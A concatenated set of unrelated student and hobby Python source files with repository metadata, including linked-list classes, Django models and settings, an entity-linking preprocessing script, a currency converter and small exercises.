df10, df10_first_visit, df10_click_target = df_proc(df10)
df11 = pd.read_csv('20201111.csv')
df11, df11_first_visit, df11_click_target = df_proc(df11)
df12 = pd.read_csv('20201112.csv')
df12, df12_first_visit, df12_click_target = df_proc(df12)
df13 = pd.read_csv('20201113.csv')
df13, df13_first_visit, df13_click_target = df_proc(df13)
df14 = pd.read_csv('20201114.csv')
df14, df14_first_visit, df14_click_target = df_proc(df14)
df15 = pd.read_csv('20201115.csv')
df15, df15_first_visit, df15_click_target = df_proc(df15)
|
[
"[email protected]"
] | |
89ff61bb886405458fa3dfd861415c75323119ed
|
d25590632c1c6873c871b75d9ab7ee6a6b06abec
|
/Lab 8/linkedQFile.py
|
b200bbda86445cd7dde60c2a700a29baa5c2fccd
|
[] |
no_license
|
karolinvalaszkai/sjnl
|
384f941427f099e24e3514a094c060f3c6ffd647
|
442fbf485c3521c7f74dacc80d1e0b0b8a5e56d2
|
refs/heads/master
| 2020-08-24T15:50:53.911101 | 2019-11-14T11:15:31 | 2019-11-14T11:15:31 | 216,858,293 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,866 |
py
|
"""värdet=None, dvs pekar inte på någonting."""
"""En kö kan implementeras likadant som en stack. Nu vill man ha en pekare i var ände på kön.
Den som hette top i stacken kallar vi first och så har vi last som pekar på sista noden. Där ska nämligen nya noder stoppas in."""
"""single linked"""
"""OBS gör dequeue o sen enqueue, ska funka med trollkarlsprogrammet"""
class Node():
def __init__(self, value):
self.data = value #värdet?
self.next = None #pekar på next
class LinkedQ():
def __init__(self):
self.__first = None #haller reda pa den forsta noden i kon
self.__last = None #pekar ut den sista
def __str__(self):
return str(self.__first.data) + "\n"
# def __str__(self, next_in_q):
# return str(next_in_q) + "\n"
def enqueue(self, x):
"""Stoppar in x sist i kön """
new_node = Node(x) #skapar noden
if self.__first == None: #tom kö
self.__first = new_node
self.__last = new_node
else:
self.__last.next = new_node
self.__last = new_node
def dequeue(self): #ta bort element 0, visar
"""Plockar ut och returnerar det som står först i kön """
if self.__first!= None:
new_node = self.__first.data
self.__first = self.__first.next
return new_node
else:
return 'Bugg'
def isEmpty(self): #kolla om kon ar tom
"""Returnerar True om kön är tom, False annars """
if self.__first == None:
return True
else:
return False
def peek(self):
"Tittar på nästa värde i kön utan att plocka ut det. dvs. första värdet"
if self.__first is not None:
next_in_q = self.__first.data
return next_in_q
|
[
"[email protected]"
] | |
460f676c069089996fb607db849fb892c0b4ab8a
|
c2e16633921d1efe584d93d769eaa7892a2fd8f3
|
/list,advanced/Messaging.py
|
aa33649a6ed9732f8fa8110516c633e59d131daa
|
[] |
no_license
|
yosifnandrov/softuni-stuff
|
bd53d418fe143ea4633a5488c1f80648da0b9ef7
|
2a76e5aee2029edf901634750d28cf153d73ece3
|
refs/heads/main
| 2023-04-17T19:53:30.254790 | 2021-05-06T11:33:39 | 2021-05-06T11:33:39 | 364,884,782 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 511 |
py
|
number = input().split()
message = input()
def get_sum(n):
sum = 0
for i in n:
sum += int(i)
return sum
for i in number:
summary = get_sum(i)
for l in range(len(message)):
if l == summary:
print(message[l], end="")
message = message[0:l:] + message[l + 1::]
break
elif l == len(message) - 1:
l = summary - len(message)
print(message[l], end="")
message = message[0:l:] + message[l + 1::]
|
[
"[email protected]"
] | |
415a144beeaa3c13258e2a371ca7213ee2725062
|
9489ec26c3a727dcac117d751f7f27244c6e5399
|
/chat/models.py
|
6ba68d798c2ad91ccf9a37dc5685d170d4b95aea
|
[] |
no_license
|
Vkotl/Message-board
|
4e8c97233c0996f939a78761b97d2b0c998d2c4c
|
001557be91a8f0835fb4dd657a00af79ed7626d1
|
refs/heads/master
| 2021-04-09T11:44:06.680561 | 2018-03-17T07:32:05 | 2018-03-17T07:32:05 | 125,601,988 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 659 |
py
|
from django.db import models
from django.contrib.auth.models import User
class Message (models.Model):
sender = models.ForeignKey(User, related_name='Sender', on_delete=models.CASCADE)
mess_receiver = models.ForeignKey(User, related_name='Receiver', on_delete=models.CASCADE)
content = models.CharField('Message', max_length=500)
pub_date = models.DateTimeField('Date sent')
def __str__(self):
temp = 'Sent from: ' + self.sender.username + '\n' + 'Sent to: ' + self.mess_receiver.username + '\n'
temp += self.content + '\n' + 'Sent on: ' + '{0}:{1}'.format(self.pub_date.hour, self.pub_date.minute)
return temp
|
[
"[email protected]"
] | |
3d146d8f05f7cdc1a43b00c4fc38aba49bc611ba
|
5afbf2c62dbd7ca41b3b1d791371cb720575b2a8
|
/supervised/preprocess/prepro_train.py
|
6fdeb4e79e130ae457589589964ea95365fc373e
|
[] |
no_license
|
andy-wagner/kb2vec
|
4a92a405940efb6c26d122f21f95686f1690fe8f
|
a91d4c84cedb0f890442d1e776562c3d4212000a
|
refs/heads/master
| 2022-02-06T17:16:49.450411 | 2019-05-29T07:39:15 | 2019-05-29T07:39:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,972 |
py
|
import supervised.preprocess.prepro_util as prepro_util
import numpy as np
from gensim.models import Doc2Vec
from sqlitedict import SqliteDict
from nltk.tokenize import word_tokenize
from random import shuffle
def load_chunkid2contextid(path=None):
if path is None:
path='/Users/sevgili/PycharmProjects/group/kb2vec/supervised/preprocess/idmaps/chunkid2contextid.txt'
chunk2contextmap = dict()
with open(path) as fin:
for line in fin:
id1, id2 = line.split('\t')
chunk2contextmap[id1] = int(id2)
return chunk2contextmap
def load_context_vec(path=None):
if path is None:
path = '/Users/sevgili/PycharmProjects/group/kb2vec/supervised/preprocess/vectors/context_vecs.npy'
return np.load(path)
def load_doc2vec(path=None):
if path is None:
path = '/Users/sevgili/Ozge-PhD/wikipedia-doc2vec/all-dim100/wikipedia_document_dim100_with_wikicorpus.doc2vec'
return Doc2Vec.load(path, mmap='r')
def load_longabs(path=None):
if path is None:
path='/Users/sevgili/Ozge-PhD/DBpedia-datasets/outputs/databases/long_abstracts.db'
return SqliteDict(path, autocommit=False)
def load_graphid2url(path=None):
if path is None:
path='/Users/sevgili/Ozge-PhD/DBpedia-datasets/outputs/databases/intersection_nodes_lookup_inv.db'
return SqliteDict(path, autocommit=False)
def load_wikiid2nnid(extension_name=None):
"""returns a map from wiki id to neural network id (for the entity embeddings)"""
wikiid2nnid = dict() # wikiid is string, nnid is integer
with open("/Users/sevgili/PycharmProjects/group/kb2vec/supervised/preprocess/idmaps/wikiid2nnid.txt") as fin:
for line in fin:
ent_id, nnid = line.split('\t')
wikiid2nnid[ent_id] = int(nnid) - 1 # torch starts from 1 instead of zero
assert(wikiid2nnid["1"] == 0)
assert(-1 not in wikiid2nnid)
wikiid2nnid["<u>"] = 0
del wikiid2nnid["1"]
#print(len(wikiid2nnid))
if extension_name:
load_entity_extension(wikiid2nnid, extension_name)
return wikiid2nnid
def load_entity_extension(wikiid2nnid, extension_name):
filepath = "/Users/sevgili/PycharmProjects/group/kb2vec/supervised/preprocess/idmaps/additional_wikiids.txt"
max_nnid = max(wikiid2nnid.values())
assert(len(wikiid2nnid) - 1 == max_nnid)
with open(filepath) as fin:
line_cnt = 1
for line in fin:
ent_id = line.strip()
if ent_id in wikiid2nnid: # if extension entities has overlap with the normal entities set
wikiid2nnid[ent_id + "dupl"] = max_nnid + line_cnt # this vector is duplicate and is never going to be used
else:
wikiid2nnid[ent_id] = max_nnid + line_cnt
line_cnt += 1
print("original entities: ", max_nnid + 1, " extension entities: ", len(wikiid2nnid) - (max_nnid+1))
def load_graph_vec(path=None):
if path is None:
#path='preprocess/vectors/ent_vecs_graph.npy'
path='/Users/sevgili/PycharmProjects/end2end_neural_el/data/entities/ent_vecs/ent_vecs_graph.npy'
return np.load(path)
def load_graph2wiki(path=None):
if path is None:
path='/Users/sevgili/PycharmProjects/group/kb2vec/supervised/preprocess/idmaps/graphid2wikiid.txt'
id2idmap = dict()
multiple_references = set()
with open(path) as fin:
for line in fin:
id1, id2 = line.split('\t')
id1, id2 = int(id1), int(id2)
try:
id2idmap[id1].add(id2)
multiple_references.add(id1)
except:
id2idmap[id1] = set()
id2idmap[id1].add(id2)
#print(count, len(multiple_references))
return id2idmap, multiple_references
class InputVecGenerator(object):
def __init__(self, graph_entity_path=None, doc2vec_path=None,
url2graphid_db=None, graphid2url_db=None, url2longabs_db=None):
self.sample_generator = prepro_util.InputSamplesGenerator(url2graphid_db)
self.chunkid2contextid = load_chunkid2contextid()
self.context_vecs = load_context_vec()
self.doc2vec = load_doc2vec(doc2vec_path)
self.wiki2nn = load_wikiid2nnid(extension_name='extension_entities')
self.url2longabs = load_longabs(url2longabs_db)
self.graph_vecs = load_graph_vec(graph_entity_path)
self.graphid2wikiid,_ = load_graph2wiki()
self.graphid2url = load_graphid2url(graphid2url_db)
def create_input_vec(self, sample):
chunk_id, chunk_words, begin_gm, end_gm, ground_truth, cand_entities, cand_entities_scores = sample
for index in range(len(begin_gm)):
candidate_entities_, ground_truth_id, begin, end = cand_entities[index],\
ground_truth[index], begin_gm[index], end_gm[index]
#print(ground_truth_id, begin, end)
if ground_truth != -1 or len(candidate_entities_) > 0: # for the one we have the correct result
context_vec = self.context_vecs[self.chunkid2contextid[chunk_id]]
span_text = ' '.join(chunk_words[begin:end])
try:
word_vec = self.doc2vec[span_text]
except KeyError:
word_vec = self.doc2vec.infer_vector(span_text)
for cand in candidate_entities_:
longab = self.url2longabs[self.graphid2url[cand]]
longab_vec = self.doc2vec.infer_vector(word_tokenize(longab))
wiki_ids = list(self.graphid2wikiid[int(cand)])
wiki_id = wiki_ids[0]
nn_id = self.wiki2nn[str(wiki_id)]
graph_vec = self.graph_vecs[int(nn_id)]
inputvec = np.concatenate((np.array(word_vec), np.array(graph_vec),
np.array(context_vec), np.array(longab_vec)), axis=0)
if int(cand) == int(ground_truth_id):
# 1 means positive
yield (inputvec, np.array([1]))
else:
# 0 means negative
yield (inputvec, np.array([0]))
def create_input_vec_for_evaluation(self, sample):
chunk_id, chunk_words, begin, end, ground_truth, candidate_entities, cand_entities_scores = sample
#print(chunk_words, candidate_entities, begin, end)
if len(candidate_entities) > 0:
context_vec = self.doc2vec.infer_vector(chunk_words)
span_text = ' '.join(chunk_words[begin:end])
#print('span', span_text)
try:
word_vec = self.doc2vec[span_text]
except KeyError:
word_vec = self.doc2vec.infer_vector(span_text)
for cand in candidate_entities:
longab = self.url2longabs[self.graphid2url[cand]]
longab_vec = self.doc2vec.infer_vector(word_tokenize(longab))
wiki_ids = list(self.graphid2wikiid[int(cand)])
wiki_id = wiki_ids[0]
nn_id = self.wiki2nn[str(wiki_id)]
graph_vec = self.graph_vecs[int(nn_id)]
inputvec = np.concatenate((np.array(word_vec), np.array(graph_vec),
np.array(context_vec), np.array(longab_vec)), axis=0)
yield (np.array([inputvec]), cand)
def format(self, list_sample):
inputs, outputs = list(), list()
index = 0
for sample in list_sample:
inputs.insert(index, sample[0])
outputs.insert(index, sample[1])
index += 1
return np.array(inputs), np.array(outputs)
# path of dataset
def process(self, path='/Users/sevgili/PycharmProjects/end2end_neural_el/data/new_datasets/ace2004.txt', ttl=False):
samples = list()
count = 0
for sample in self.sample_generator.process(path, ttl=ttl):
#chunk_id, chunk_words, begin_gm, end_gm, ground_truth, cand_entities, cand_entities_scores = sample
#print(chunk_words, begin_gm, end_gm, cand_entities)
#print('lengths', len(begin_gm), len(end_gm), len(cand_entities))
for input_vec in self.create_input_vec(sample):
if input_vec == -1:
return -1
samples.append(input_vec)
count += 1
print('# of context', count)
print('finished creating input files', len(samples))
shuffle(samples)
print('finished shuffling samples')
inputs, outputs = self.format(samples)
print('finished formatting')
return inputs, outputs
if __name__ == "__main__":
inputvecgenerator = InputVecGenerator()
inputvecgenerator.process(path='/Users/sevgili/PycharmProjects/end2end_neural_el/data/new_datasets/msnbc.txt')
|
[
"[email protected]"
] | |
10c5cd8101cff8672ef60125ceffa4769b4d7c27
|
21682f70ff130169d8800a06b1a6d8bf7f46e45a
|
/functions/decoraters/variablelengthargument/demo.py
|
15d8a2f86e7c77c3241c3e719adc2bc1555f7f55
|
[] |
no_license
|
Aravind2595/MarchPythonProject
|
03c3aeee40f5ff2c635861ac29f31a7633499d51
|
9aa9241632b7f96e7e1cb33b3adb7b8def36f1f8
|
refs/heads/master
| 2023-05-05T04:16:45.556737 | 2021-05-20T08:43:52 | 2021-05-20T08:43:52 | 368,791,704 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 252 |
py
|
def add(*args): #muttiple argument passing ;it will also accept 0 argument
res=0 #* is important not 'args' eg: *hai or *arg=
for num in args:#argument will be stored in tuple format
res+=num
return res
print(add(10,20,30,40))
|
[
"[email protected]"
] | |
a55a5dbb88d327f149accfe6b902a079dd80d019
|
fe43d0dcab4ae34321ba6139bf113cf0519cd037
|
/cursos/migrations/0004_auto_20200603_2017.py
|
a913f986879023196703b626704ff3b8b86b635d
|
[] |
no_license
|
clecio-sousa/projeto-market-place
|
3ab23608db01dd3a07bfafe24a45a342e7e40730
|
af3cdb13708eca771b3abdb402613d4c850c4dae
|
refs/heads/master
| 2023-03-29T19:59:41.693098 | 2021-04-06T02:40:45 | 2021-04-06T02:40:45 | 355,030,540 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 640 |
py
|
# Generated by Django 3.0.6 on 2020-06-03 23:17
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cursos', '0003_auto_20200603_1842'),
]
operations = [
migrations.AddField(
model_name='curso',
name='slug',
field=models.SlugField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='curso',
name='data_publicacao',
field=models.DateTimeField(blank=True, default=datetime.datetime(2020, 6, 3, 20, 17, 42, 953278)),
),
]
|
[
"[email protected]"
] | |
1e4fc17bed5f3bca085566203de7580dbe427874
|
b5187b5ffd53a2cdc8ec6ed94effc39702c1ea31
|
/loyalty_app/loyalty/doctype/sales_list/sales_list.py
|
3f630555c69f95a1f081ba33f89e1bac9d77c915
|
[
"MIT"
] |
permissive
|
vignesharumainayagam/engagex-loyalty_app-backup-
|
946a7f75c5ae5cce33313142a0b4e6ba29d67cb6
|
4c326c5f7b22572146f0b946d6498e85ac22a143
|
refs/heads/master
| 2020-03-11T18:00:14.106005 | 2018-04-19T05:36:06 | 2018-04-19T05:36:06 | 130,163,935 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 254 |
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Loyalty and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class Sales_list(Document):
pass
|
[
"[email protected]"
] | |
9713d01cfa2fe2619b7f1a674adc7200e8760e05
|
c5f0b15b4e03cbf29092d1c05bc8361490df76e4
|
/run_vehicle.py
|
76803862b6148fffc8a0d929556730642e602fe7
|
[] |
no_license
|
e-harris/vehicle_classes
|
3fa152ec9757f313851d448b4ab1dd78b0d9b8fe
|
c17d3b109cafc1a9be0a2a9280654dcfcf0d8c47
|
refs/heads/master
| 2021-03-03T22:48:59.242550 | 2020-03-09T09:16:24 | 2020-03-09T09:16:24 | 245,991,001 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 285 |
py
|
from vehicle_class import *
from plane_class import *
from car_class import *
car1 = car(2, "none", "Ferrari", 680, 185)
car2 = car(5, "small", "Vauxhall", 120, 135)
plane1 = plane(100, "passengers and luggage", "40,000", 10, 2)
plane2 = plane(10,"passengers", "55,000", 4, 2)
|
[
"[email protected]"
] | |
ea02622ccae8492548b091136b268bf259b5cebd
|
23ec6adce704bff40d04cd6fc0ba446375405b68
|
/Non Leetcode Solutions/linked_list_py.py
|
378d3a34b439b5b394c573f968a35ed1cc2897d6
|
[] |
no_license
|
amoghrajesh/Coding
|
1845be9ea8df2d13d2a21ebef9ee6de750c8831d
|
a7dc41a4963f97dfb62ee4b1cab5ed80043cfdef
|
refs/heads/master
| 2023-08-31T10:10:48.948129 | 2023-08-30T15:04:02 | 2023-08-30T15:04:02 | 267,779,618 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,952 |
py
|
class Node(object):
def __init__(self,data,next_node=None):
self.data=data
self.next_node=next_node
def get_next(self):
return self.next_node
def set_next(self,next_node):
self.next_node=next_node
def get_data(self):
return self.data
def set_data(self,data):
self.data=data
def has_next(self):
if self.get_next() is None:
return False
return True
def toString(self):
return str(self.get_data())
class LinkedList(object):
def __init__(self,r=None):
self.root=r
self.size=0
def get_size(self):
return self.size
def add(self,d):#add at beginning
new_node=Node(d,self.root)
self.root=new_node
self.size+=1
def remove(self,data):
this_node=self.root
prev_node=None
while this_node is not None:
if this_node.get_data() == data:
if prev_node is not None:
prev_node.set_next(this_node.get_next())
else:
self.root=this_node.get_next()
self.size-=1
return True
else:
prev_node=this_node
this_node=this_node.get_next()
return False
def find(self,data):
this_node=self.root
while this_node is not None:
if this_node.get_data() == data:
return True
this_node=this_node.get_next()
return False
def print_list(self):
this_node=self.root
while this_node.has_next():
print(this_node.toString())
this_node=this_node.get_next()
myList=LinkedList()
myList.add(1)
myList.add(4)
myList.add(6)
myList.add(2)
print("size:",myList.get_size())
'''myList.remove(6)
print("size:",myList.get_size())
print("Is 2 present?",myList.find(-2))'''
myList.print_list()
|
[
"[email protected]"
] | |
ecadfa08af60d3d184ece78cbecf7ec9acff06ae
|
82e330917892cdd1c1c2b3885bf319172635a7dc
|
/01_get_name.py
|
75ba9c6dd4da6831f3be4803a7581b693f0323b1
|
[] |
no_license
|
harada0510/LDA_topic_model
|
0b0f00f049a96b37473a1bee02e76aaf83a1a8af
|
8a47780114a3993ed37d9e25e821def47a5d5566
|
refs/heads/master
| 2022-08-10T11:27:05.405925 | 2020-05-17T16:02:21 | 2020-05-17T16:02:21 | 255,925,782 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 525 |
py
|
# coding: utf-8
import requests
from bs4 import BeautifulSoup
r = requests.get("https://ja.wikipedia.org/wiki/%E6%97%A5%E6%9C%AC%E3%81%AE%E5%A4%A7%E5%AD%A6%E4%B8%80%E8%A6%A7")
soup = BeautifulSoup(r.text, "html.parser")
b=open("university.txt","w")
flg = 0
for a in soup.find_all("a"):
if "愛国学園大学" == a.text:
flg = 1
if flg == 1 and "大学" in a.text:
print(a.text, a.attrs['href'])
b.write(a.text + "\n")
if "和洋女子大学" == a.text:
flg = 0
b.close()
|
[
"[email protected]"
] | |
320687db2d1fc6caf127a9b4f5b1f96927e80f57
|
2acd3d3616ab6ae6a56602f8c28c9cb2d6fd6db0
|
/config/settings.py
|
13c13dee96727b13a815724aa918b12547a4d6e4
|
[] |
no_license
|
EgorovM/hb_maker
|
45f3d7375d3aa5c06127f5bfc7cab2bff88192da
|
d0524cc81e5c5cb85b4de1a397219876d44daf42
|
refs/heads/main
| 2023-09-03T05:09:39.297948 | 2021-11-11T20:43:47 | 2021-11-11T20:43:47 | 352,812,794 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,274 |
py
|
"""
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-cu6ykde21-!@=582-#1mgj$5xhph@hxybo1qqtsut8uas^w@b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'creator',
'viewer',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static',)
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media',)
MEDIA_URL = '/media/'
|
[
"[email protected]"
] | |
4d4a2cd8c7b880f58d88cf2c676256acdae1c32c
|
e789ea3fd9a6ff64f89f90388e4999bf32183e25
|
/Simple/loop2.py
|
2a335f0bbc32e9710aaf40aee71af5012933b25e
|
[
"MIT"
] |
permissive
|
Nahalius/PythonBasics
|
dfe6978de290b26d4bab2d1775c42b2abc53cb17
|
f59f167cb7c3edf962cb381ee7d66394da500a11
|
refs/heads/master
| 2020-12-30T15:30:40.417782 | 2017-05-28T07:33:17 | 2017-05-28T07:33:17 | 91,152,809 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 387 |
py
|
# -*- coding: utf-8 -*-
#WhileLoop
counter = 5;
while counter > 0:
print ("Broiach = ", counter)
counter = counter - 1
#Break and continue
j = 0;
for i in range(5): #range (start, end, step)
j = j + 2
print ('i = ', i, ', j = ', j)
if j == 4:
continue
print("I will be skipped over if j = 4")
if j == 6:
break
#Use try to display errors
|
[
"[email protected]"
] | |
f2f6849f452be00fd78a4d71ef94cbd1d111f88a
|
f8be36a49d9cd0c5ad4c4e9ab0958bca76d27976
|
/sources/python/genscript/calculate.py
|
e407037cf9c1b886ef6a209dcddc2eb4d2990a85
|
[] |
no_license
|
demlanide/psytestgen
|
156197e175053bb324ebc8a67b1bc168df0848f0
|
b3530882d790e7e99738c121d23f38425552a690
|
refs/heads/master
| 2023-06-24T06:07:46.301591 | 2021-07-21T20:39:25 | 2021-07-21T20:39:25 | 388,239,664 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,093 |
py
|
import sqlite3
from openpyxl import load_workbook
import sys
id_user = str(sys.argv[1])
connection = sqlite3.connect("/Users/dameli/Desktop/diploma/generator/sources/gendb.db")
crsr = connection.cursor()
sql_command = "SELECT count(*) FROM traits"
crsr.execute(sql_command)
ans = crsr.fetchall()
n = ans[0][0]
sql_command = "SELECT id_trait FROM traits"
crsr.execute(sql_command)
ans = crsr.fetchall()
lst = ans
wb = load_workbook("/Users/dameli/Desktop/diploma/generator/sources/analysis.xlsx")
title1 = 'regression_a' # названия листа в excel документе которая хранит а коэффициент
title2 = 'regression_b' # название листа в excel документе которая хранит b коэффициент
sql_command = "SELECT id_trait, result FROM (SELECT id_user, id_trait, result FROM results WHERE result LIKE '~%') WHERE id_user = ?"
crsr.execute(sql_command, id_user)
ans = crsr.fetchall()
tests_num = [] # список номеров тестов которые нужно рассчитать
answers_evaluate = [] # список номеров тестов от результатов которых нужно рассчитать
for i in range(0, len(ans)):
tests_num.append(ans[i][0])
answers_evaluate.append(ans[i][1])
k = len(tests_num)
while k > 0:
for i in range(0, len(tests_num)):
x = int(answers_evaluate[i][1:])
y = int(tests_num[i])
a = wb[title1].cell(row=x, column=y).value
b = wb[title2].cell(row=x, column=y).value
sql_command = "SELECT result FROM results WHERE id_user = ? AND id_trait = " + str(x) + " AND result IS NOT NULL AND result NOT LIKE '~%'"
crsr.execute(sql_command, id_user)
ans = crsr.fetchall()
if len(ans) != 0:
test_res = ans[0][0]
res = str(int(a + b * test_res))
sql_command = "UPDATE results SET result = ? WHERE id_user = " + id_user + " AND id_trait = " + str(y)
crsr.execute(sql_command, res)
connection.commit()
k -= 1
|
[
"[email protected]"
] | |
b1df1327d79b654f1819f0289b69a4ab8c88928c
|
ee052bcf1a0836156c5d97a6a0aa4ed45dc19716
|
/currencyConverter.py
|
8d73a79f044e27d75dfad40f3bd5cdf6c483e90e
|
[] |
no_license
|
JATIN-RATHI/CurrencyConverter
|
194f88166cece1f30a97cf0bc1ef6f4884d3c5a1
|
ca15cdb3ab6f87180460d8bf572a7816d7928015
|
refs/heads/master
| 2022-11-21T03:04:57.031541 | 2020-07-23T09:43:43 | 2020-07-23T09:43:43 | 281,911,713 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,952 |
py
|
# Link :---> https://www.x-rates.com/table/?from=INR&amount=1
if __name__ == '__main__':
with open('currencyDATA') as f:
lines = f.readlines()
dict = {}
for line in lines:
parsed = line.split("\t")
dict[parsed[0]] = parsed[1]
print("Choose any one to convert Indian currency into : \n1: Argentine Peso\n2: Australian Dollar\n3: Bahraini "
"Dinar\n4: Botswana Pula\n5: Brazilian Real\n6: British Pound\n7: Bruneian Dollar\n8: Bulgarian Lev\n9: "
"Canadian Dolla\n10: Chilean Peso\n11: Chinese Yuan Renminbi\n12: Colombian Peso\n13: Croatian Kuna\n14: "
"Czech Koruna\n15: Danish Krone\n16: Emirati Dirham\n17: Euro\n18: Hong Kong Dollar\n19: Hungarian "
"Forint\n20: Icelandic Krona\n21: Indonesian Rupiah\n22: Iranian Rial\n23: Israeli Shekel\n24: Japanese "
"Yen\n25: Kazakhstani Tenge\n26: Kuwaiti Dinar\n27: Libyan Dinar\n28: Malaysian Ringgit\n29: Mauritian "
"Rupee\n30: Mexican Peso\n31: Nepalese Rupee\n32: New Zealand Dollar\n33: Norwegian Krone\n34: Omani "
"Rial\n35: Pakistani Rupee\n36: Philippine Peso\n37: Polish Zloty\n38: Qatari Riyal\n39: Romanian New "
"Leu\n40: Russian Ruble\n41: Saudi Arabian Riyal\n42: Singapore Dollar\n43: South African Rand \n44: "
"South Korean Won\n45: Sri Lankan Rupee\n46: Swedish Krona\n47: Swiss Franc\n48: Taiwan New Dollar\n49: "
"Thai Baht\n50: Trinidadian Dollar\n51: Turkish Lira\n52: US Dollar\n53: Venezuelan Bolivar")
choose = int(input("Enter your choice : ")) - 1
name = dict.keys()
key_list = list(name)
currency_name = key_list[choose]
amt = dict.values()
value_list = list(amt)
currency_value = value_list[choose]
amount = int(input("Enter amount to be converted: "))
total = amount * float(currency_value)
print(f"{amount} Indian Rupee = {total} {currency_name} ")
|
[
"[email protected]"
] | |
feaa839db358be617d5064a1b3db799632606b49
|
2dce8d098f5f3c93abdfc388e6dac319bfb6450d
|
/Projetos/des087.py
|
fac0cbacecf04db47728a64caac0a77cf6046304
|
[
"MIT"
] |
permissive
|
LucasDeAndradeMarin/Marin-python-training
|
9fe27c5ae04755e8bbcc6609ca3d60ab9f4bfbaf
|
9537f6ff26fa1f93e20aee306f35a71765d7fdd1
|
refs/heads/main
| 2023-04-28T01:28:15.084559 | 2021-05-18T13:32:04 | 2021-05-18T13:32:04 | 368,541,703 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 702 |
py
|
matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
for l in range(0, 3):
for c in range(0, 3):
matriz[l][c] = int(input(f'Digite um valor para [{l}, {c}]: '))
princ = (matriz[0][0]*matriz[1][1]*matriz[2][2]) + (matriz[0][1]*matriz[1][2]*matriz[2][0]) + (matriz[0][2]*matriz[1][0]*matriz[2][1])
sec = (matriz[2][0]*matriz[1][1]*matriz[0][2]) + (matriz[2][1]*matriz[1][2]*matriz[0][0]) + (matriz[2][2]*matriz[1][0]*matriz[0][1])
det = princ - sec
print('-=-'*30)
for l in range(0, 3):
for c in range(0, 3):
print(f'[{matriz[l][c]:^5}]', end='')
print()
print('-=-'*25)
print(f'Como a diagonal principal equivale à {princ} e a secundária à {sec}, o determinante equivale à: {det}')
|
[
"[email protected]"
] | |
a43de45d509562e3a2e9e6e97acf12b91554dfdf
|
b6a4059b31448f47ecf641fbdee7a6b13aec0933
|
/MDP Solving Algorithms/ValueIteration.py
|
abb414b495aab01f617bb390cb84b666a86669c7
|
[] |
no_license
|
Calman102/BMath--Hons.--Thesis-Code
|
57bbb49483480ae91338ed15cbd8cfab05167054
|
0115ae76e2476b4c40c5c8e58455c5496d455ceb
|
refs/heads/master
| 2023-01-13T07:06:17.820966 | 2020-10-23T11:31:41 | 2020-10-23T11:31:41 | 296,011,163 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 478 |
py
|
import numpy as np
def VI(S, A, P, R, ε, γ):
""" Value Iteration Algorithm. """
# Initialization
